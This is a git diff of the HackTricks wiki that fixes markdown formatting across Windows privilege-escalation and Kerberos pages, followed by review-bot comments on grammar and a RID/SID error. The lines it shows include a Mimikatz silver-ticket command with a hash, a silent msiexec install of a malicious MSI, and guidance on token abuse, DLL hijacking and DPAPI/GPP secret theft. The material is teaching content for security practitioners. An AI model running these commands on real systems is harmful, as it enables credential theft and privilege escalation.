@@ -96,10 +96,10 @@ The following Mimikatz command creates a Silver Ticket for the CIFS service on t mimikatz “kerberos::golden /admin:LukeSkywalker /id:1106 /domain:lab.adsecurity.org /sid:S-1-5-21-1473643419-774954089-2222329127 /target:adsmswin2k8r2.lab.adsecurity.org /rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /ptt” exit ``` -#### ****[**Trust Ticket**](https://adsecurity.org/?p=1588)**** +#### [**Trust Ticket**](https://adsecurity.org/?p=1588) Once the Active Directory Trust password hash is determined, a trust ticket can be generated. The trust tickets are created using the shared password between 2 Domains that trust each other.\ -****[More background on Trust Tickets.](https://adsecurity.org/?p=1588) +[More background on Trust Tickets.](https://adsecurity.org/?p=1588) **Dumping trust passwords (trust keys)** @@ -125,7 +125,7 @@ Trust Ticket Specific Required Parameters: #### **More KERBEROS** **KERBEROS::List** – List all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current user’s tickets.\ -****Similar to functionality of “klist”. +Similar to functionality of “klist”. **KERBEROS::PTC** – pass the cache (NT6)\ \*Nix systems like Mac OS, Linux,BSD, Unix, etc cache Kerberos credentials. This cached data can be copied off and passed using Mimikatz. Also useful for injecting Kerberos tickets in ccache files. diff --git a/windows/windows-local-privilege-escalation/README.md b/windows/windows-local-privilege-escalation/README.md index 650656a6..b86bb16f 100644 --- a/windows/windows-local-privilege-escalation/README.md +++ b/windows/windows-local-privilege-escalation/README.md 
@@ -5,11 +5,11 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop?frequency=one-time) **for individuals and companies.** -Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)**** +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} 
@@ -211,7 +211,7 @@ You can exploit this vulnerability using the tool [**WSUSpicious**](https://gith ## AlwaysInstallElevated -**If** these 2 registers are **enabled** (value is **0x1**), then users of any privilege can **install** (execute) \*\* `*.msi`\*\* files as NT AUTHORITY\\**SYSTEM**. +**If** these 2 registers are **enabled** (value is **0x1**), then users of any privilege can **install** (execute) ** `*.msi`** files as NT AUTHORITY\\**SYSTEM**. ```bash reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated @@ -253,7 +253,7 @@ Read this tutorial to learn how to create a MSI wrapper using this tools. Note t ### MSI Installation -To execute the **installation** of the \*\*malicious `.msi` \*\* file in **background:** +To execute the **installation** of the **malicious `.msi` ** file in **background:** ``` msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\alwe.msi 
@@ -1121,7 +1121,7 @@ Search for a file called **SiteList.xml** Before KB2928120 (see MS14-025), some Group Policy Preferences could be configured with a custom account. This feature was mainly used to deploy a custom local administrator account on a group of machines. There were two problems with this approach though. First, since the Group Policy Objects are stored as XML files in SYSVOL, any domain user can read them. The second problem is that the password set in these GPPs is AES256-encrypted with a default key, which is publicly documented. This means that any authenticated user could potentially access very sensitive data and elevate their privileges on their machine or even the domain. This function will check whether any locally cached GPP file contains a non-empty "cpassword" field. If so, it will decrypt it and return a custom PS object containing some information about the GPP along with the location of the file. -Search in \*\* **\_**C:\ProgramData\Microsoft\Group Policy\history\*\* \_ or in _**C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history** (previous to W Vista)_ for these files: +Search in ** **\_**C:\ProgramData\Microsoft\Group Policy\history** \_ or in _**C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history** (previous to W Vista)_ for these files: * Groups.xml * Services.xml 
@@ -1406,7 +1406,7 @@ Using this technique is usually **selected any process running as SYSTEM with al ### **Named Pipes** -This technique is used by meterpreter to escalate in `getsystem`. The technique consists on **creating a pipe and then create/abuse a service to write on that pipe**. Then, the **server** that created the pipe using the \*\*`SeImpersonate` \*\* privilege will be able to **impersonate the token** of the pipe client (the service) obtaining SYSTEM privileges.\ +This technique is used by meterpreter to escalate in `getsystem`. The technique consists on **creating a pipe and then create/abuse a service to write on that pipe**. Then, the **server** that created the pipe using the **`SeImpersonate` ** privilege will be able to **impersonate the token** of the pipe client (the service) obtaining SYSTEM privileges.\ If you want to [**learn more about name pipes you should read this**](./#named-pipe-client-impersonation).\ If you want to read an example of [**how to go from high integrity to System using name pipes you should read this**](from-high-integrity-to-system-with-name-pipes.md). diff --git a/windows/windows-local-privilege-escalation/access-tokens.md b/windows/windows-local-privilege-escalation/access-tokens.md index 3dd310ed..b8ed6ad5 100644 --- a/windows/windows-local-privilege-escalation/access-tokens.md +++ b/windows/windows-local-privilege-escalation/access-tokens.md @@ -50,7 +50,7 @@ SeIncreaseWorkingSetPrivilege Increase a process working set Disabled SeTimeZonePrivilege Change the time zone Disabled ``` - or using _Process Explorer_ from Sysinternals (select process and access"Security" tab): +or using _Process Explorer_ from Sysinternals (select process and access"Security" tab): ![](<../../.gitbook/assets/image (321).png>) 
@@ -81,12 +81,12 @@ This is useful if you have useful credentials to access objects in the network b There are two types of tokens available: * **Primary token**: Primary tokens can only be **associated to processes**, and they represent a process's security subject. The creation of primary tokens and their association to processes are both privileged operations, requiring two different privileges in the name of privilege separation - the typical scenario sees the authentication service creating the token, and a logon service associating it to the user's operating system shell. Processes initially inherit a copy of the parent process's primary token. -* **Impersonation token**: Impersonation is a security concept implemented in Windows NT that **allows** a server application to **temporarily** "**be**" **the client** in terms of access to secure objects. Impersonation has **four possible levels**: +* **Impersonation token**: Impersonation is a security concept implemented in Windows NT that **allows** a server application to **temporarily** "**be**" **the client** in terms of access to secure objects. Impersonation has **four possible levels**: * **anonymous**, giving the server the access of an anonymous/unidentified user * **identification**, letting the server inspect the client's identity but not use that identity to access objects * **impersonation**, letting the server act on behalf of the client - * **delegation**, same as impersonation but extended to remote systems to which the server connects (through the preservation of credentials). + * **delegation**, same as impersonation but extended to remote systems to which the server connects (through the preservation of credentials). The client can choose the maximum impersonation level (if any) available to the server as a connection parameter. 
Delegation and impersonation are privileged operations (impersonation initially was not, but historical carelessness in the implementation of client APIs failing to restrict the default level to "identification", letting an unprivileged server impersonate an unwilling privileged client, called for it). **Impersonation tokens can only be associated to threads**, and they represent a client process's security subject. Impersonation tokens are usually created and associated to the current thread implicitly, by IPC mechanisms such as DCE RPC, DDE and named pipes. diff --git a/windows/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md b/windows/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md index 698bf27c..04d3505f 100644 --- a/windows/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md +++ b/windows/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md @@ -1,6 +1,6 @@ # AppendData/AddSubdirectory permission over service registry -**Information copied from** [**https://itm4n.github.io/windows-registry-rpceptmapper-eop/**](https://itm4n.github.io/windows-registry-rpceptmapper-eop/)**** +**Information copied from** [**https://itm4n.github.io/windows-registry-rpceptmapper-eop/**](https://itm4n.github.io/windows-registry-rpceptmapper-eop/) According to the output of the script, the current user has some write permissions on two registry keys: diff --git a/windows/windows-local-privilege-escalation/create-msi-with-wix.md b/windows/windows-local-privilege-escalation/create-msi-with-wix.md index e39278b8..a04790f2 100644 --- a/windows/windows-local-privilege-escalation/create-msi-with-wix.md +++ b/windows/windows-local-privilege-escalation/create-msi-with-wix.md 
@@ -37,7 +37,7 @@ fail_here ``` - We will use `candle.exe` from wixtools to create a wixobject from `msi.xml` +We will use `candle.exe` from wixtools to create a wixobject from `msi.xml` ```markup candle.exe -out C:\tem\wix C:\tmp\Ethereal\msi.xml diff --git a/windows/windows-local-privilege-escalation/dll-hijacking.md b/windows/windows-local-privilege-escalation/dll-hijacking.md index e402e9dc..85f899ff 100644 --- a/windows/windows-local-privilege-escalation/dll-hijacking.md +++ b/windows/windows-local-privilege-escalation/dll-hijacking.md @@ -47,7 +47,7 @@ You can see the **DLL search order on 32-bit** systems below: 1. The directory from which the application loaded. 2. The system directory. Use the [**GetSystemDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getsystemdirectorya) function to get the path of this directory.(_C:\Windows\System32_) 3. The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched. (_C:\Windows\System_) -4. The Windows directory. Use the [**GetWindowsDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya) function to get the path of this directory. +4. The Windows directory. Use the [**GetWindowsDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya) function to get the path of this directory. 1. (_C:\Windows_) 5. The current directory. 6. The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the **App Paths** registry key. The **App Paths** key is not used when computing the DLL search path. 
@@ -104,7 +104,7 @@ Other interesting automated tools to discover this vulnerability are **PowerSplo ### Example In case you find an exploitable scenario one of the most important things to successfully exploit it would be to **create a dll that exports at least all the functions the executable will import from it**. Anyway, note that Dll Hijacking comes handy in order to [escalate from Medium Integrity level to High **(bypassing UAC)**](../authentication-credentials-uac-and-efs.md#uac) or from[ **High Integrity to SYSTEM**](./#from-high-integrity-to-system)**.** You can find an example of **how to create a valid dll** inside this dll hijacking study focused on dll hijacking for execution: [**https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows**](https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows)**.**\ -****Moreover, in the **next sectio**n you can find some **basic dll codes** that might be useful as **templates** or to create a **dll with non required functions exported**. +Moreover, in the **next sectio**n you can find some **basic dll codes** that might be useful as **templates** or to create a **dll with non required functions exported**. ## **Creating and compiling Dlls** diff --git a/windows/windows-local-privilege-escalation/dpapi-extracting-passwords.md b/windows/windows-local-privilege-escalation/dpapi-extracting-passwords.md index 9e7dd2b8..6d9f00d6 100644 --- a/windows/windows-local-privilege-escalation/dpapi-extracting-passwords.md +++ b/windows/windows-local-privilege-escalation/dpapi-extracting-passwords.md 
@@ -30,7 +30,7 @@ DPAPI is utilized to protect the following personal data: An example of a successful and clever way to protect data using DPAPI is the implementation of the auto-completion password encryption algorithm in Internet Explorer. To encrypt the login and password for a certain web page, it calls the CryptProtectData function, where in the optional entropy parameter it specifies the address of the web page. Thus, unless one knows the original URL where the password was entered, nobody, not even Internet Explorer itself, can decrypt that data back. {% endhint %} -## Master Keys +## Master Keys The DPAPI keys used for encrypting the user's RSA keys are stored under `%APPDATA%\Microsoft\Protect\{SID}` directory, where {SID} is the [Security Identifier](https://en.wikipedia.org/wiki/Security\_Identifier) of that user. **The DPAPI key is stored in the same file as the master key that protects the users private keys**. It usually is 64 bytes of random data. (Notice that this directory is protected so you cannot list it using`dir` from the cmd, but you can list it from PS). @@ -47,7 +47,7 @@ This is what a bunch of Master Keys of a user will looks like: ![](<../../.gitbook/assets/image (324).png>) -Usually **each master keys is an encrypted symmetric key that can decrypt other content**. Therefore, **extracting** the **encrypted Master Key** is interesting in order to **decrypt** later that **other content** encrypted with it. +Usually **each master keys is an encrypted symmetric key that can decrypt other content**. Therefore, **extracting** the **encrypted Master Key** is interesting in order to **decrypt** later that **other content** encrypted with it. ### Extract a master key 
@@ -121,7 +121,7 @@ You can find an example on how to encrypt and decrypt data with DPAPI using C# i ## DonPAPI -****[**DonPAPI**](https://github.com/login-securite/DonPAPI) can dump secrets protected by DPAPI automatically. +[**DonPAPI**](https://github.com/login-securite/DonPAPI) can dump secrets protected by DPAPI automatically. ## References diff --git a/windows/windows-local-privilege-escalation/leaked-handle-exploitation.md b/windows/windows-local-privilege-escalation/leaked-handle-exploitation.md index ca38c94d..a8bdb022 100644 --- a/windows/windows-local-privilege-escalation/leaked-handle-exploitation.md +++ b/windows/windows-local-privilege-escalation/leaked-handle-exploitation.md @@ -45,7 +45,7 @@ If an **unprivileged process inherits** a **handle** with **write** equivalent * ### Process Hacker -****[**Process Hacker**](https://github.com/processhacker/processhacker) is a tool you can download for free. It has several amazing options to inspect processes and one of them is the **capability to see the handles of each process**. +[**Process Hacker**](https://github.com/processhacker/processhacker) is a tool you can download for free. It has several amazing options to inspect processes and one of them is the **capability to see the handles of each process**. Note that in order to **see all the handles of all the processes, the SeDebugPrivilege is needed** (so you need to run Process Hacker as administrator). @@ -65,7 +65,7 @@ The [**Handles** ](https://docs.microsoft.com/en-us/sysinternals/downloads/handl ### LeakedHandlesFinder -****[**This tool**](https://github.com/lab52io/LeakedHandlesFinder) allows you to **monitor** leaked **handles** and even **autoexploit** them to escalate privileges. +[**This tool**](https://github.com/lab52io/LeakedHandlesFinder) allows you to **monitor** leaked **handles** and even **autoexploit** them to escalate privileges. ### Methodology 
@@ -677,11 +677,11 @@ int main(int argc, char **argv) { ## Other tools and examples -* [**https://github.com/lab52io/LeakedHandlesFinder**](https://github.com/lab52io/LeakedHandlesFinder)**** +* [**https://github.com/lab52io/LeakedHandlesFinder**](https://github.com/lab52io/LeakedHandlesFinder) This tool allows you to monitor leaked handles to find vulnerable ones and even auto-exploit them. It also has a tool to leak one. -* [**https://github.com/abankalarm/ReHacks/tree/main/Leaky%20Handles**](https://github.com/abankalarm/ReHacks/tree/main/Leaky%20Handles)**** +* [**https://github.com/abankalarm/ReHacks/tree/main/Leaky%20Handles**](https://github.com/abankalarm/ReHacks/tree/main/Leaky%20Handles) Another tool to leak a handle and exploit it. diff --git a/windows/windows-local-privilege-escalation/named-pipe-client-impersonation.md b/windows/windows-local-privilege-escalation/named-pipe-client-impersonation.md index d5a3b444..2fd4cdd7 100644 --- a/windows/windows-local-privilege-escalation/named-pipe-client-impersonation.md +++ b/windows/windows-local-privilege-escalation/named-pipe-client-impersonation.md @@ -1,6 +1,6 @@ # Named Pipe Client Impersonation -**This information was copied from** [**https://ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation**](https://ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation)**** +**This information was copied from** [**https://ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation**](https://ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation) ## Overview 
@@ -119,7 +119,7 @@ Note that in order to impersonate the token of the client process you need to ha It is possible for the named pipe server to impersonate the named pipe client's security context by leveraging a `ImpersonateNamedPipeClient` API call which in turn changes the named pipe server's current thread's token with that of the named pipe client's token. -We can update the the named pipe server's code like this to achieve the impersonation - note that modifications are seen in line 25 and below: +We can update the the named pipe server's code like this to achieve the impersonation - note that modifications are seen in line 25 and below: ```cpp int main() { diff --git a/windows/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md b/windows/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md index c95cbc1a..69787106 100644 --- a/windows/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md +++ b/windows/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md 
@@ -28,7 +28,7 @@ If you have enabled this token you can use **KERB\_S4U\_LOGON** to get an **impe This privilege causes the system to **grant all read access** control to any file (only read).\ Use it to **read the password hashes of local Administrator** accounts from the registry and then use "**psexec**" or "**wmicexec**" with the hash (PTH).\ - This attack won't work if the Local Administrator is disabled, or if it is configured that a Local Admin isn't admin if he is connected remotely.\ +This attack won't work if the Local Administrator is disabled, or if it is configured that a Local Admin isn't admin if he is connected remotely.\ You can **abuse this privilege** with: [https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1](https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1) or with [https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug](https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug) or following IppSec in [https://www.youtube.com/watch?v=IfCysW0Od8w\&t=2610\&ab\_channel=IppSec](https://www.youtube.com/watch?v=IfCysW0Od8w\&t=2610\&ab\_channel=IppSec) ### SeRestorePrivilege (3.1.5) 
@@ -39,16 +39,16 @@ You can **modify services**, DLL Hijacking, set **debugger** (Image File Executi ### SeCreateTokenPrivilege (3.1.6) This token **can be used** as EoP method **only** if the user **can impersonate** tokens (even without SeImpersonatePrivilege).\ - In a possible scenario, a user can impersonate the token if it is for the same user and the integrity level is less or equal to the current process integrity level.\ - In this case, the user could **create an impersonation token** and add to it a privileged group SID. +In a possible scenario, a user can impersonate the token if it is for the same user and the integrity level is less or equal to the current process integrity level.\ +In this case, the user could **create an impersonation token** and add to it a privileged group SID. ### SeLoadDriverPrivilege (3.1.7) **Load and unload device drivers.**\ -****You need to create an entry in the registry with values for ImagePath and Type.\ +You need to create an entry in the registry with values for ImagePath and Type.\ As you don't have access to write to HKLM, you have to **use HKCU**. 
But HKCU doesn't mean anything for the kernel, the way to guide the kernel here and use the expected path for a driver config is to use the path: "\Registry\User\S-1-5-21-582075628-3447520101-2530640108-1003\System\CurrentControlSet\Services\DriverName" (the ID is the **RID** of the current user).\ - So, you have to **create all that path inside HKCU and set the ImagePath** (path to the binary that is going to be executed) **and Type** (SERVICE\_KERNEL\_DRIVER 0x00000001).\ -[**Learn how to exploit it here.**](../active-directory-methodology/privileged-accounts-and-token-privileges.md#seloaddriverprivilege)**** +So, you have to **create all that path inside HKCU and set the ImagePath** (path to the binary that is going to be executed) **and Type** (SERVICE\_KERNEL\_DRIVER 0x00000001).\ +[**Learn how to exploit it here.**](../active-directory-methodology/privileged-accounts-and-token-privileges.md#seloaddriverprivilege) ### SeTakeOwnershipPrivilege (3.1.8)
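Review bot: the `-## Master Keys` / `+## Master Keys` pair in the dpapi.md hunk at @@ -30 renders identically, so the change must be a non-printing character (a non-breaking or zero-width space); the commit message "fix bad chars" should name the character and how it was located, otherwise a reviewer cannot verify that the heading actually changed or search the rest of the repository for the same character.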
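Review bot: the `+Usually **each master keys is an encrypted symmetric key ...` line in the dpapi.md hunk at @@ -47 carries the grammar error over from the `-` line; since the line is rewritten anyway, make it "each master key is an encrypted symmetric key that can decrypt other content". The untouched context line "This is what a bunch of Master Keys of a user will looks like" has the same kind of slip ("will look like") and could be fixed in the same pass.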
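Review bot: the leading `****` removed at @@ -121 (`-****[**DonPAPI**](https://github.com/login-securite/DonPAPI)`) is an empty bold pair that the GitBook export emits before links; the same artifact is removed in the Process Hacker and LeakedHandlesFinder hunks and as a trailing `)****` in the leaked-handle-exploitation.md list, so a repository-wide search for `****` (or a markdown lint rule that rejects empty emphasis) should accompany this change to catch the occurrences this patch did not touch.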
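Review bot: the `+We can update the the named pipe server's code like this` line in the named-pipe-client-impersonation.md hunk at @@ -119 keeps the duplicated "the the" from the `-` line; since the line is already being rewritten, drop the duplicate ("We can update the named pipe server's code like this").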
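Review bot: in the privilege-escalation-abusing-tokens.md hunk at @@ -39, the context line just above `+So, you have to **create all that path inside HKCU ...` says "(the ID is the **RID** of the current user)", but the example path `\Registry\User\S-1-5-21-582075628-3447520101-2530640108-1003\System\CurrentControlSet\Services\DriverName` is keyed by the user's full SID; only the trailing 1003 is the RID. Suggest "the ID is the SID of the current user" (as printed by `whoami /user`), since a reader who substitutes just the RID builds a key the kernel will never look up. In the same hunk, the touched `+In a possible scenario ...` line reads "less or equal to"; change it to "less than or equal to".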